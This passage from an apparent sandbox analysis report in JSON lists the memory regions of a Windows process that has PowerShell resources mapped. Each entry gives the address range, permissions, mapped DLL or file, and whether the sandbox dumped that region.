"\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1071", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:00:55.924", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1072", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:00:55.925", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1073", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:55.925", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1074", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:00:55.925", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1075", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:00:55.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1076", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:00:55.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1077", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:00:55.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1078", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:00:55.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1079", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:00:55.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1080", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:00:55.929", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1081", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:00:55.929", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1082", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:55.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1083", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:55.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 8421375, "entry_point": 0, "filename": null, "id": "region_1084", "name": "pagefile_0x0000000000680000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6815744, "timestamp": "00:00:55.935", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1085", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:00:55.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1086", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:00:55.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_1087", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:55.960", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_1088", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:00:55.960", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1257471, "entry_point": 1245184, "filename": "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_1089", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 1245184, "timestamp": "00:00:55.960", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001090-addr_0x0000000000140000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_289", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_1090", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:00:55.961", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001091-addr_0x0000000000150000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_290", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_1091", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:00:55.961", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001092-addr_0x0000000000330000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_291", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1092", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:00:55.962", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001093-addr_0x0000000000530000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_292", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 5701631, "entry_point": 0, "filename": null, "id": "region_1093", "name": "private_0x0000000000530000", "norm_filename": null, "region_type": "private_memory", "start_va": 5439488, "timestamp": "00:00:55.962", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8454144, "type": "region", "version": 1 }, "end_va": 10031103, "entry_point": 0, "filename": null, "id": "region_1094", "name": "pagefile_0x0000000000810000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8454144, "timestamp": "00:00:55.962", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10092544, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_1095", "name": "pagefile_0x00000000009a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10092544, "timestamp": "00:00:55.962", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001096-addr_0x0000000001f20000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_293", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 32636928, "type": "region", "version": 1 }, "end_va": 32899071, "entry_point": 0, "filename": null, "id": "region_1096", "name": "private_0x0000000001f20000", "norm_filename": null, "region_type": "private_memory", "start_va": 32636928, "timestamp": "00:00:55.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1943732224, "type": "region", "version": 1 }, "end_va": 1944256511, "entry_point": 1943812041, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_1097", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1943732224, "timestamp": "00:00:55.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_1098", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:00:55.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 3141631, "entry_point": 0, "filename": null, "id": "region_1099", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:00:55.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_1100", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:00:55.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_1101", "name": "pagefile_0x0000000000180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1572864, "timestamp": "00:00:55.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1941110784, "type": "region", "version": 1 }, "end_va": 1941204991, "entry_point": 1941118109, "filename": "\\Windows\\SysWOW64\\userenv.dll", "id": "region_1102", "name": "userenv.dll", "norm_filename": "c:\\windows\\syswow64\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1941110784, "timestamp": "00:00:55.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1957953536, "type": "region", "version": 1 }, "end_va": 1957998591, "entry_point": 1957960082, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_1103", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1957953536, "timestamp": "00:00:55.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1969553408, "type": "region", "version": 1 }, "end_va": 1982439423, "entry_point": 1970083329, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1104", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1969553408, "timestamp": "00:00:55.985", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1646591, "entry_point": 0, "filename": null, "id": "region_1105", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:00:56.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1708031, "entry_point": 0, "filename": null, "id": "region_1106", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:00:56.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1777663, "entry_point": 0, "filename": null, "id": "region_1107", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:00:56.015", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001108-addr_0x0000000000340000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_294", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_1108", "name": "private_0x0000000000340000", "norm_filename": null, "region_type": "private_memory", "start_va": 3407872, "timestamp": "00:00:56.016", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001109-addr_0x0000000000450000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_295", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4784127, "entry_point": 0, "filename": null, "id": "region_1109", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:00:56.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 35844095, "entry_point": 32899072, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1110", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32899072, "timestamp": "00:00:56.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1954676736, "type": "region", "version": 1 }, "end_va": 1956372479, "entry_point": 1954866869, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1111", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1954676736, "timestamp": "00:00:56.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1956642816, "type": "region", "version": 1 }, "end_va": 1956777983, "entry_point": 1956648030, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_1112", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1956642816, "timestamp": "00:00:56.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1956839424, "type": "region", "version": 1 }, "end_va": 1957842943, "entry_point": 1956908446, "filename": "\\Windows\\SysWOW64\\propsys.dll", "id": "region_1113", "name": "propsys.dll", "norm_filename": "c:\\windows\\syswow64\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1956839424, "timestamp": "00:00:56.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1982464000, "type": "region", "version": 1 }, "end_va": 1982746623, "entry_point": 1982468577, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_1114", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1982464000, "timestamp": "00:00:56.019", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001115-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_296", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1115", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:00:56.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_1116", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:00:56.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3289087, "entry_point": 3145728, "filename": "\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db", "id": "region_1117", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db", "region_type": "memory_mapped_file", "start_va": 3145728, "timestamp": "00:00:56.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1988587519, "entry_point": 1988450489, "filename": "\\Windows\\SysWOW64\\cfgmgr32.dll", "id": "region_1118", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\syswow64\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:00:56.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1991114752, "type": "region", "version": 1 }, "end_va": 1992806399, "entry_point": 1991120871, "filename": "\\Windows\\SysWOW64\\setupapi.dll", "id": "region_1119", "name": "setupapi.dll", "norm_filename": "c:\\windows\\syswow64\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1991114752, "timestamp": "00:00:56.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1995112448, "type": "region", "version": 1 }, "end_va": 1995186175, "entry_point": 1995117633, "filename": "\\Windows\\SysWOW64\\devobj.dll", "id": "region_1120", "name": "devobj.dll", "norm_filename": "c:\\windows\\syswow64\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1995112448, "timestamp": "00:00:56.033", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001121-addr_0x0000000001da0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_297", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 32112639, "entry_point": 0, "filename": null, "id": "region_1121", "name": "private_0x0000000001da0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31064064, "timestamp": "00:00:56.106", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001122-addr_0x0000000001ee0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_298", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 32374784, "type": "region", "version": 1 }, "end_va": 32636927, "entry_point": 0, "filename": null, "id": "region_1122", "name": "private_0x0000000001ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32374784, "timestamp": "00:00:56.106", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 35848192, "type": "region", "version": 1 }, "end_va": 39989247, "entry_point": 0, "filename": null, "id": "region_1123", "name": "pagefile_0x0000000002230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35848192, "timestamp": "00:00:56.106", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001124-addr_0x0000000002740000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_299", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41418751, "entry_point": 0, "filename": null, "id": "region_1124", "name": "private_0x0000000002740000", "norm_filename": null, "region_type": "private_memory", "start_va": 41156608, "timestamp": "00:00:56.106", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1954021376, "type": "region", "version": 1 }, "end_va": 1954332671, "entry_point": 1954032660, "filename": "\\Windows\\SysWOW64\\apphelp.dll", "id": "region_1125", "name": "apphelp.dll", "norm_filename": "c:\\windows\\syswow64\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1954021376, "timestamp": "00:00:56.107", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 1954480128, "type": "region", "version": 1 }, "end_va": 1954668543, "entry_point": 1954487226, "filename": "\\Windows\\SysWOW64\\shdocvw.dll", "id": "region_1126", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\syswow64\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 1954480128, "timestamp": "00:00:56.107", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001127-addr_0x000000007efd5000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], 